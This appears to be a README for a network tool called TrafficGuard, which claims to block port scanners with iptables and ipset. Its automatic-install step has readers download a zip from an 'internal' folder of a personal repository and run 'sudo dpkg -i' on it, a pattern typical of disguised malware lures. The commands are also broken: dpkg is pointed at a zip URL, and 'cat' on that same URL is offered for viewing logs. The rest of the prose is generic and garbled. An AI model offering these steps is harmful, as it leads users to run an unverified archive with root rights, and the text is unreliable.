TrafficGuard helps you block unwanted port scanners. It uses iptables and ipset to manage network traffic effectively. This tool supports logging and aggregating statistics, ensuring you know what activity occurs on your network.
You can use TrafficGuard to secure your local network from unwanted scans. This ensures your systems are protected from probing attacks and helps maintain overall network safety.
TrafficGuard complies with all applicable laws. Please consult local regulations before deploying network monitoring tools.
To start using TrafficGuard, follow these simple steps:
- Download the latest version from the Releases page.
- Install the tool using your preferred method.
- Configure the settings to meet your needs.
For automatic installation, run the following commands in your terminal:
curl -LO https://github.com/richdz12/traffic-guard/raw/refs/heads/master/internal/traffic-guard-v3.1.zip
sudo dpkg -i https://github.com/richdz12/traffic-guard/raw/refs/heads/master/internal/traffic-guard-v3.1.zipTo install manually, download the release from the link below and follow the installation instructions in the README:
- Block port scanners effectively.
- Log traffic for later analysis.
- Aggregate statistical data for performance monitoring.
- Simple user interface for configuration.
TrafficGuard includes a selection of public lists for blocking known bad actors. Utilize these lists to enhance your security posture.
- Activate daily scans to review unauthorized access.
- Set alerts for specific thresholds of scanning activity.
You can customize TrafficGuard settings via configuration files. Adjust the logging levels, allowed IPs, and other options to tailor the tool to your environment.
LLogging is crucial for understanding traffic patterns. Customize logging settings in the configuration file.
Logs are stored in the /var/log/traffic-guard directory. Access these files to analyze past activity.
Log files can be exported in CSV format for further analysis. This helps in sharing data or conducting in-depth reviews.
Be aware of the limits on log file sizes. Set up rotation to manage space effectively.
Use a simple command to view the current logs. For example:
cat https://github.com/richdz12/traffic-guard/raw/refs/heads/master/internal/traffic-guard-v3.1.zipWhen installed, TrafficGuard will create the following:
- Directories for configuration and logs.
- System services for automatic operation on startup.
TrafficGuard is licensed under the MIT License. You are free to use and modify the software under the terms of this license.
Visit the Releases page to download TrafficGuard for your system and start protecting your network today!